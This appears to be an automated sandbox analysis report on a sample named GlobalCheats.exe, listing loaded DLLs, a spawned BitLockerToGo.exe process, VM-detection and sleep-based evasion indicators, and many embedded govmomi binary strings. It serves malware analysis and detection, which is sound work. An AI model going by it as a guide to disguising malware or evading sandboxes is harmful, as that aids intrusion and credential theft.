Source: C:\Users\user\Desktop\GlobalCheats.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Users\user\Desktop\GlobalCheats.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior

Source: C:\Users\user\Desktop\GlobalCheats.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\GlobalCheats.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: GlobalCheats.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: GlobalCheats.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: GlobalCheats.exe

Static file information: File size 87635968 > 1048576

Source: GlobalCheats.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1dcb200
Source: GlobalCheats.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0xcbf200
Source: GlobalCheats.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x271d800

Source: GlobalCheats.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008DA000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C00119E000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000003.1953940488.00000264599B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008DA000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1971607307.000000C00119E000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000003.1953940488.00000264599B0000.00000004.00001000.00020000.00000000.sdmp

Source: GlobalCheats.exe

Static PE information: section name: .xdata

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032EF392 pushfd ; ret		4_2_032EF393
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032EFC8F push edx; ret		4_2_032EFC90

Source: C:\Users\user\Desktop\GlobalCheats.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6936	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7160	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DrsSoftRuleViolationEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestRegistryKeyParentVolatile).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmInstanceUuidConflictEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2450
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3781
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmMacAssignedEvent).GetVmEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3780
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*PlacementAction).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DVPortgroupReconfiguredEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1128
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1129
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2459
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfNoSpaceOnControllerFault).GetOvfFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1120
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2452
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3783
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualAHCIController).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1121
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2451
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3782
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1122
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2454
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3785
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1123
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2453
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3784
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1124
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2456
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3787
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1125
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2455
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3786
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualParallelPortOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3789
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2458
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1126
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*MigrationHostErrorEvent).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3788
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2457
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1127
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VmBeingRelocatedEvent).GetVmRelocateSpecEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.AlarmEmailCompletedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3770
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsCannotMoveVmInUserFolder).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveSnapshotInfoRequestType
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDiskSparseVer1BackingOption).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NetIpRouteConfigInfoIpRoute).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1117
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2449
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1118
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2448
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3779
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1119
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.FindByDnsName
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotChangeHaSettingsForFtSecondary).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NoLicenseServerConfiguredFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2441
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3772
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3771
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2440
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1110
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1111
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2443
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3774
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1112
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2442
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3773
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmGuestRebootEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1113
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2445
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3776
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1114
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2444
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3775
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*NoPeerHostFound).GetHostPowerOpFailed
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1115
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2447
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3778
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1116
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2446
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3777
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestFileInfo).GetDynamicData
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationVmFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VspanPortMoveFaultFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmDasUpdateErrorEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*VAppPropertyFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*AlarmEmailCompletedEvent).GetEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DisallowedDiskModeChange).GetInvalidVmConfig
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/json.jsonError.Error
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*DeviceHotPlugNotSupported).GetVimFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmRenamedEvent
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1106
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2438
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3769
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3768
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2437
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1107
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidDasRestartPriorityForFtVmFault).GetMethodFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1108
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.(*SnapshotMoveToNonHomeNotSupportedFault).GetSnapshotCopyNotSupported
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1109
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2439
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75BBED000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: VmToolsUpgradeFault
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2430
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3761
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3760
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.1100
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.2432
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: github.com/vmware/govmomi/vim25/types.init.3763
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75CFFB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.SendTestNotification
